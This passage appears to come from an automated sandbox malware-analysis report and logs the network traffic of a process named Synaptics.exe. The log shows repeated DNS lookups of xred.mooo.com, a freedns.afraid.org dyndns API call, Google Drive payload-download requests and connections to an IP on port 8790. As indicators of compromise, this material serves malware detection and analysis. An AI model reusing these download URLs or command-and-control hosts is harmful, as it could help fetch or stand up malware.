                                                                                        Dec 24, 2024 22:12:16.534132004 CET44349955142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:16.534307957 CET49955443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:16.534538984 CET49955443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:16.534554958 CET44349955142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:16.835839033 CET49941443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:16.835884094 CET44349941142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:17.648413897 CET49952443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:17.648452044 CET49954443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:17.648452044 CET49953443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:17.648514032 CET49955443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:17.649241924 CET49962443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:17.649283886 CET44349962142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:17.649384022 CET49962443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:17.650249958 CET49962443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:17.650263071 CET44349962142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:17.650561094 CET49963443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:17.650623083 CET44349963142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:17.654823065 CET49963443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:17.655683994 CET49963443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:17.655726910 CET44349963142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:19.340603113 CET44349962142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:19.340666056 CET49962443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:19.341247082 CET44349962142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:19.341291904 CET49962443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:19.345371008 CET44349963142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:19.345448971 CET49963443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:19.346036911 CET44349963142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:19.346110106 CET49963443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:36.149346113 CET879049733103.36.221.195192.168.2.4
                                                                                        Dec 24, 2024 22:12:36.308137894 CET497338790192.168.2.4103.36.221.195
                                                                                        Dec 24, 2024 22:13:20.836852074 CET4974080192.168.2.469.42.215.252
                                                                                        Dec 24, 2024 22:13:20.839993000 CET49963443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:13:20.843561888 CET49962443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:13:36.226069927 CET879049733103.36.221.195192.168.2.4
                                                                                        Dec 24, 2024 22:13:36.293550014 CET497338790192.168.2.4103.36.221.195
                                                                                        Dec 24, 2024 22:14:36.302642107 CET879049733103.36.221.195192.168.2.4
                                                                                        Dec 24, 2024 22:14:36.416403055 CET497338790192.168.2.4103.36.221.195

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 22:11:07.462415934 CET6449053192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:07.599659920 CET53644901.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:08.324580908 CET6448853192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:08.462591887 CET53644881.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:08.477906942 CET5870553192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:08.828917027 CET53587051.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.653214931 CET5081253192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:10.791969061 CET53508121.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:12.915415049 CET5790553192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:13.053833961 CET53579051.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:17.588068962 CET5419553192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:17.728652954 CET53541951.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:23.415467024 CET5371153192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:23.553342104 CET53537111.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:28.088285923 CET5482353192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:28.227714062 CET53548231.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.915239096 CET6264853192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:34.053229094 CET53626481.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:38.555986881 CET6159653192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:38.696131945 CET53615961.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:44.369179964 CET5103853192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:44.505985022 CET53510381.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:49.025343895 CET5133353192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:49.164690971 CET53513331.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.869601965 CET5575053192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:55.007740974 CET53557501.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.531586885 CET5846153192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:59.668736935 CET53584611.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:05.352777004 CET6035153192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:12:05.490787983 CET53603511.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.025399923 CET5182953192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:12:10.162976980 CET53518291.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:15.899920940 CET5682953192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:12:16.037115097 CET53568291.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 24, 2024 22:11:07.462415934 CET192.168.2.41.1.1.10xf82Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:08.324580908 CET192.168.2.41.1.1.10x7b74Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:08.477906942 CET192.168.2.41.1.1.10xfce1Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:10.653214931 CET192.168.2.41.1.1.10x212eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:12.915415049 CET192.168.2.41.1.1.10x8bb9Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:17.588068962 CET192.168.2.41.1.1.10x7611Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:23.415467024 CET192.168.2.41.1.1.10x9438Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:28.088285923 CET192.168.2.41.1.1.10xdc0dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:33.915239096 CET192.168.2.41.1.1.10x87f9Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:38.555986881 CET192.168.2.41.1.1.10x3837Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:44.369179964 CET192.168.2.41.1.1.10x6af6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:49.025343895 CET192.168.2.41.1.1.10x5f2bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:54.869601965 CET192.168.2.41.1.1.10x39c5Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:59.531586885 CET192.168.2.41.1.1.10x6625Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:12:05.352777004 CET192.168.2.41.1.1.10xf77bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:12:10.025399923 CET192.168.2.41.1.1.10x1eb9Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:12:15.899920940 CET192.168.2.41.1.1.10x43f8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 24, 2024 22:11:07.599659920 CET1.1.1.1192.168.2.40xf82No error (0)docs.google.com142.250.181.14A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:08.462591887 CET1.1.1.1192.168.2.40x7b74Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:08.828917027 CET1.1.1.1192.168.2.40xfce1No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:10.791969061 CET1.1.1.1192.168.2.40x212eNo error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:13.053833961 CET1.1.1.1192.168.2.40x8bb9Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:17.728652954 CET1.1.1.1192.168.2.40x7611Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:23.553342104 CET1.1.1.1192.168.2.40x9438Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:28.227714062 CET1.1.1.1192.168.2.40xdc0dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:34.053229094 CET1.1.1.1192.168.2.40x87f9Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:38.696131945 CET1.1.1.1192.168.2.40x3837Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:44.505985022 CET1.1.1.1192.168.2.40x6af6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:49.164690971 CET1.1.1.1192.168.2.40x5f2bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:55.007740974 CET1.1.1.1192.168.2.40x39c5Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:11:59.668736935 CET1.1.1.1192.168.2.40x6625Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:12:00.327739000 CET1.1.1.1192.168.2.40x1c68No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 24, 2024 22:12:00.327739000 CET1.1.1.1192.168.2.40x1c68No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:12:05.490787983 CET1.1.1.1192.168.2.40xf77bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:12:10.162976980 CET1.1.1.1192.168.2.40x1eb9Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 22:12:16.037115097 CET1.1.1.1192.168.2.40x43f8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • docs.google.com
                                                                                        • drive.usercontent.google.com
                                                                                        • freedns.afraid.org

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.44974069.42.215.252807644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 24, 2024 22:11:08.985790968 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                        User-Agent: MyApp
                                                                                        Host: freedns.afraid.org
                                                                                        Cache-Control: no-cache
                                                                                        Dec 24, 2024 22:11:10.644807100 CET243INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 24 Dec 2024 21:11:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        X-Cache: MISS
                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1fERROR: Could not authenticate.0
                                                                                        Dec 24, 2024 22:11:10.646573067 CET243INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 24 Dec 2024 21:11:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        X-Cache: MISS
                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449735142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:10 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:09 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-3n0AdwPdz2jWFFll8GGpxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449734142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:10 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:09 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-557ev4-C_DIPLuXK2IvGyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449744142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:13 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:12 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cn-okkAgP9u5_BChx6BLcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449745142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:12 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:13 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:12 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-k0GksqgdgNqqckbF2R_k8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449747142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:12 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-24 21:11:13 UTC1595INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC557Hv_HOLpf4KjtxE7VNh1ywnGJfmVys6STkpqu9Iz2nxNsMK6VCVvjEHzblZJkL5G
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:13 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BAq6LDjmjgpTjI_xCI-wpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Set-Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR; expires=Wed, 25-Jun-2025 21:11:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:13 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 49 32 42 4e 6a 75 47 2d 39 67 4b 6a 57 6a 6b 35 32 34 49 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LI2BNjuG-9gKjWjk524IIg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                        2024-12-24 21:11:13 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449746142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:12 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-24 21:11:13 UTC1602INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4hScLdnGCuYWqVYuk5Mf1tbrmYb90l-I7PFbRASJwmx8IGzxOKeq15URZwelwNMBtnR3CJgfM
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:13 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8BJ9zOTNVeEpSCIbFV21XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
